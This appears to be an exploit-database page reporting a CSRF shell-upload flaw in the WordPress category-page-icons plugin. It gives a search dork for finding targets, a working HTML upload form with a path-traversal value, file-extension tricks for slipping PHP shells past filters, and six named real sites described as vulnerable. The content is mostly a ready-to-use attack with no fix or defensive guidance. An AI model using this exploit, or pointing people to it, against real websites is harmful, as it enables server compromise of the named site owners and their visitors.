WordPress category-page-icons Plugins 3.6.1 CSRF Backdoor Access Vulnerability

2019.01.18
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-434
Dork: inurl:''/wp-content/plugins/category-page-icons/''

#################################################################### # Exploit Title : WordPress category-page-icons Plugins 3.6.1 CSRF Shell Upload # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 17/01/2019 # Vendor Homepage : wordpress.org wp-premiumplugins.com/category-page-icons/ wordpress.org/plugins/category-page-icons/ # Software Download Link : github.com/wp-plugins/category-page-icons/archive/master.zip # Software Vulnerable Code => [ wpdev-flash-uploader.php ] plugins.svn.wordpress.org/category-page-icons/trunk/include/wpdev-flash-uploader.php github.com/wp-plugins/category-page-icons/blob/master/include/wpdev-flash-uploader.php # Version Information : Current Version 3.6.1 => + Requires at least: 2.7 - Tested up to: 3.6.1 - Stable tag: 0.9.2 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/category-page-icons/'' # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] CWE-434 [ Unrestricted Upload of File with Dangerous Type ] CWE-98 [ Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') ] # PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/151193/WordPress-Category-Page-Icons-3.6.1-CSRF-Shell-Upload.html #################################################################### WordPress category-page-icons Plugins 3.6.1 CSRF Backdoor Access Vulnerability #################################################################### # Arbitrary File Upload/Shell Upload CSRF Exploit : ********************************************* <form enctype="multipart/form-data" action="https://VULNERABLESITEHERE/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="post"> Your File: <input name="wpdev-async-upload" type="file" /><br /> <input type="hidden" name="dir_icons" value="../../../../"> <input type="submit" value="upload" /> </form> #################################################################### # Directory File Path : ********************* SITE/[yourfilename.php.pjpg] SITE/wp-content/[yourfilename.php.pjpg] # Allowed File Extensions : txt - jpg - gif - png - html.jpg - php.pjpg - asp;.gif - php;.gif - phtml #################################################################### # Example Vulnerable Sites : ************************* [+] dtacmail.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php [+] dutary.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php [+] ddns2u.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php [+] inuse.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php [+] ceobible.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php [+] guruok.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top